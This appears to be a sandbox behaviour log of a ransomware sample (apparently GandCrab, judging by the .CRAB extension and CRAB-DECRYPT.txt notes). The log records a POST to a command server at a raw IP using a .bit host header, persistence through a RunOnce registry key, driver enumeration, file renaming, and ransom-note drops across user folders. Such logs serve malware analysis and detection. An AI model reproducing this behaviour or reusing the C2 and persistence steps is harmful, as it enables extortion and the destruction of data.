Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 185.42.194.116, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = fee, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 185.42.194.116/fee True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
Fn
System Get Time type = Ticks, time = 27331 True 1
Fn
System Get Time type = Ticks, time = 28220 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
Data
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
Data
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW True 1
Fn
Thread 0x7dc
264 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 2424832 True 1
Fn
Driver Get Name load_address = 41975808 True 1
Fn
Driver Get Name load_address = 48177152 True 1
Fn
Driver Get Name load_address = 12288000 True 1
Fn
Driver Get Name load_address = 13205504 True 1
Fn
Driver Get Name load_address = 13529088 True 1
Fn
Driver Get Name load_address = 13611008 True 1
Fn
Driver Get Name load_address = 14725120 True 1
Fn
Driver Get Name load_address = 15511552 True 1
Fn
Driver Get Name load_address = 16183296 True 1
Fn
Driver Get Name load_address = 16244736 True 1
Fn
Driver Get Name load_address = 16601088 True 1
Fn
Driver Get Name load_address = 16637952 True 1
Fn
Driver Get Name load_address = 13996032 True 1
Fn
Driver Get Name load_address = 16678912 True 1
Fn
Driver Get Name load_address = 14204928 True 1
Fn
Driver Get Name load_address = 14290944 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 16732160 True 1
Fn
Driver Get Name load_address = 14376960 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14548992 True 1
Fn
Driver Get Name load_address = 14614528 True 1
Fn
Driver Get Name load_address = 17813504 True 1
Fn
Driver Get Name load_address = 18124800 True 1
Fn
Driver Get Name load_address = 19156992 True 1
Fn
Driver Get Name load_address = 18206720 True 1
Fn
Driver Get Name load_address = 18874368 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 18984960 True 1
Fn
Driver Get Name load_address = 19054592 True 1
Fn
Driver Get Name load_address = 21557248 True 1
Fn
Driver Get Name load_address = 22552576 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 23248896 True 1
Fn
Driver Get Name load_address = 25362432 True 1
Fn
Driver Get Name load_address = 25665536 True 1
Fn
Driver Get Name load_address = 25731072 True 1
Fn
Driver Get Name load_address = 26042368 True 1
Fn
Driver Get Name load_address = 26075136 True 1
Fn
Driver Get Name load_address = 26312704 True 1
Fn
Driver Get Name load_address = 26386432 True 1
Fn
Driver Get Name load_address = 26423296 True 1
Fn
Driver Get Name load_address = 26660864 True 1
Fn
Driver Get Name load_address = 26750976 True 1
Fn
Driver Get Name load_address = 27176960 True 1
Fn
Driver Get Name load_address = 27213824 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 21147648 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 21299200 True 1
Fn
Driver Get Name load_address = 21336064 True 1
Fn
Driver Get Name load_address = 21372928 True 1
Fn
Driver Get Name load_address = 21417984 True 1
Fn
Driver Get Name load_address = 17244160 True 1
Fn
Driver Get Name load_address = 21487616 True 1
Fn
Driver Get Name load_address = 47079424 True 1
Fn
Driver Get Name load_address = 47640576 True 1
Fn
Driver Get Name load_address = 47923200 True 1
Fn
Driver Get Name load_address = 47960064 True 1
Fn
Driver Get Name load_address = 48115712 True 1
Fn
Driver Get Name load_address = 46137344 True 1
Fn
Driver Get Name load_address = 46247936 True 1
Fn
Driver Get Name load_address = 46329856 True 1
Fn
Driver Get Name load_address = 46661632 True 1
Fn
Driver Get Name load_address = 46710784 True 1
Fn
Driver Get Name load_address = 46755840 True 1
Fn
Driver Get Name load_address = 56881152 True 1
Fn
Driver Get Name load_address = 57417728 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57610240 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57823232 True 1
Fn
Driver Get Name load_address = 57970688 True 1
Fn
Driver Get Name load_address = 58040320 True 1
Fn
Driver Get Name load_address = 58392576 True 1
Fn
Driver Get Name load_address = 58540032 True 1
Fn
Driver Get Name load_address = 58630144 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56713216 True 1
Fn
Driver Get Name load_address = 46817280 True 1
Fn
Driver Get Name load_address = 46866432 True 1
Fn
Driver Get Name load_address = 22945792 True 1
Fn
Driver Get Name load_address = 17383424 True 1
Fn
Driver Get Name load_address = 17518592 True 1
Fn
Driver Get Name load_address = 48177152 True 1
Fn
Driver Get Name load_address = 19095552 True 1
Fn
Driver Get Name load_address = 20873216 True 1
Fn
Driver Get Name load_address = 56860672 True 1
Fn
Driver Get Name load_address = 18591744 True 1
Fn
Driver Get Name load_address = 17625088 True 1
Fn
Driver Get Name load_address = 65826816 True 1
Fn
Driver Get Name load_address = 66195456 True 1
Fn
Driver Get Name load_address = 66281472 True 1
Fn
Driver Get Name load_address = 66658304 True 1
Fn
Driver Get Name load_address = 66908160 True 1
Fn
Driver Get Name load_address = 67047424 True 1
Fn
Driver Get Name load_address = 65011712 True 1
Fn
Driver Get Name load_address = 65069056 True 1
Fn
Driver Get Name load_address = 65118208 True 1
Fn
Driver Get Name load_address = 65163264 True 1
Fn
Driver Get Name load_address = 917504 True 1
Fn
Driver Get Name load_address = 65241088 True 1
Fn
Driver Get Name load_address = 5963776 True 1
Fn
Driver Get Name load_address = 65290240 True 1
Fn
Driver Get Name load_address = 7340032 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 65347584 True 1
Fn
Driver Get Name load_address = 65404928 True 1
Fn
Driver Get Name load_address = 65507328 True 1
Fn
Driver Get Name load_address = 65544192 True 1
Fn
Driver Get Name load_address = 65552384 True 1
Fn
Driver Get Name load_address = 65609728 True 1
Fn
Driver Get Name load_address = 65753088 True 1
Fn
Driver Get Name load_address = 26947584 True 1
Fn
Driver Get Name load_address = 27033600 True 1
Fn
Driver Get Name load_address = 51085312 True 1
Fn
Driver Get Name load_address = 51908608 True 1
Fn
Driver Get Name load_address = 52031488 True 1
Fn
Driver Get Name load_address = 52129792 True 1
Fn
Driver Get Name load_address = 50331648 True 1
Fn
Driver Get Name load_address = 50647040 True 1
Fn
Driver Get Name load_address = 69832704 True 1
Fn
Driver Get Name load_address = 70512640 True 1
Fn
Driver Get Name load_address = 70557696 True 1
Fn
Driver Get Name load_address = 70758400 True 1
Fn
Driver Get Name load_address = 70832128 True 1
Fn
Driver Get Name load_address = 69206016 True 1
Fn
Driver Get Name load_address = 2001534976 True 1
Fn
Driver Get Name load_address = 1208811520 True 1
Fn
Driver Get Name load_address = 4286513152 True 1
Fn
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 2424832 True 1
Fn
Driver Get Name load_address = 41975808 True 1
Fn
Driver Get Name load_address = 48177152 True 1
Fn
Driver Get Name load_address = 12288000 True 1
Fn
Driver Get Name load_address = 13205504 True 1
Fn
Driver Get Name load_address = 13529088 True 1
Fn
Driver Get Name load_address = 13611008 True 1
Fn
Driver Get Name load_address = 14725120 True 1
Fn
Driver Get Name load_address = 15511552 True 1
Fn
Driver Get Name load_address = 16183296 True 1
Fn
Driver Get Name load_address = 16244736 True 1
Fn
Driver Get Name load_address = 16601088 True 1
Fn
Driver Get Name load_address = 16637952 True 1
Fn
Driver Get Name load_address = 13996032 True 1
Fn
Driver Get Name load_address = 16678912 True 1
Fn
Driver Get Name load_address = 14204928 True 1
Fn
Driver Get Name load_address = 14290944 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 16732160 True 1
Fn
Driver Get Name load_address = 14376960 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14548992 True 1
Fn
Driver Get Name load_address = 14614528 True 1
Fn
Driver Get Name load_address = 17813504 True 1
Fn
Driver Get Name load_address = 18124800 True 1
Fn
Driver Get Name load_address = 19156992 True 1
Fn
Driver Get Name load_address = 18206720 True 1
Fn
Driver Get Name load_address = 18874368 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 18984960 True 1
Fn
Driver Get Name load_address = 19054592 True 1
Fn
Driver Get Name load_address = 21557248 True 1
Fn
Driver Get Name load_address = 22552576 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 23248896 True 1
Fn
Driver Get Name load_address = 25362432 True 1
Fn
Driver Get Name load_address = 25665536 True 1
Fn
Driver Get Name load_address = 25731072 True 1
Fn
Driver Get Name load_address = 26042368 True 1
Fn
Driver Get Name load_address = 26075136 True 1
Fn
Driver Get Name load_address = 26312704 True 1
Fn
Driver Get Name load_address = 26386432 True 1
Fn
Driver Get Name load_address = 26423296 True 1
Fn
Driver Get Name load_address = 26660864 True 1
Fn
Driver Get Name load_address = 26750976 True 1
Fn
Driver Get Name load_address = 27176960 True 1
Fn
Driver Get Name load_address = 27213824 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 21147648 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 21299200 True 1
Fn
Driver Get Name load_address = 21336064 True 1
Fn
Driver Get Name load_address = 21372928 True 1
Fn
Driver Get Name load_address = 21417984 True 1
Fn
Driver Get Name load_address = 17244160 True 1
Fn
Driver Get Name load_address = 21487616 True 1
Fn
Driver Get Name load_address = 47079424 True 1
Fn
Driver Get Name load_address = 47640576 True 1
Fn
Driver Get Name load_address = 47923200 True 1
Fn
Driver Get Name load_address = 47960064 True 1
Fn
Driver Get Name load_address = 48115712 True 1
Fn
Driver Get Name load_address = 46137344 True 1
Fn
Driver Get Name load_address = 46247936 True 1
Fn
Driver Get Name load_address = 46329856 True 1
Fn
Driver Get Name load_address = 46661632 True 1
Fn
Driver Get Name load_address = 46710784 True 1
Fn
Driver Get Name load_address = 46755840 True 1
Fn
Driver Get Name load_address = 56881152 True 1
Fn
Driver Get Name load_address = 57417728 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57610240 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57823232 True 1
Fn
Driver Get Name load_address = 57970688 True 1
Fn
Driver Get Name load_address = 58040320 True 1
Fn
Driver Get Name load_address = 58392576 True 1
Fn
Driver Get Name load_address = 58540032 True 1
Fn
Driver Get Name load_address = 58630144 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56713216 True 1
Fn
Driver Get Name load_address = 46817280 True 1
Fn
Driver Get Name load_address = 46866432 True 1
Fn
Driver Get Name load_address = 22945792 True 1
Fn
Driver Get Name load_address = 17383424 True 1
Fn
Driver Get Name load_address = 17518592 True 1
Fn
Driver Get Name load_address = 48177152 True 1
Fn
Driver Get Name load_address = 19095552 True 1
Fn
Driver Get Name load_address = 20873216 True 1
Fn
Driver Get Name load_address = 56860672 True 1
Fn
Driver Get Name load_address = 18591744 True 1
Fn
Driver Get Name load_address = 17625088 True 1
Fn
Driver Get Name load_address = 65826816 True 1
Fn
Driver Get Name load_address = 66195456 True 1
Fn
Driver Get Name load_address = 66281472 True 1
Fn
Driver Get Name load_address = 66658304 True 1
Fn
Driver Get Name load_address = 66908160 True 1
Fn
Driver Get Name load_address = 67047424 True 1
Fn
Driver Get Name load_address = 65011712 True 1
Fn
Driver Get Name load_address = 65069056 True 1
Fn
Driver Get Name load_address = 65118208 True 1
Fn
Driver Get Name load_address = 65163264 True 1
Fn
Driver Get Name load_address = 917504 True 1
Fn
Driver Get Name load_address = 65241088 True 1
Fn
Driver Get Name load_address = 5963776 True 1
Fn
Driver Get Name load_address = 65290240 True 1
Fn
Driver Get Name load_address = 7340032 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 65347584 True 1
Fn
Driver Get Name load_address = 65404928 True 1
Fn
Driver Get Name load_address = 65507328 True 1
Fn
Driver Get Name load_address = 65544192 True 1
Fn
Driver Get Name load_address = 65552384 True 1
Fn
Driver Get Name load_address = 65609728 True 1
Fn
Driver Get Name load_address = 65753088 True 1
Fn
Driver Get Name load_address = 26947584 True 1
Fn
Driver Get Name load_address = 27033600 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\aETAdzjz\AppData\Roaming True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x7705df04 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = wwbqfihnkoe, data = "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe", size = 112, type = REG_SZ True 1
Fn
Thread 0x5f0
315 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x7705dfc8 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IME12\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP12\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP8_1\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\IMJP9_0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
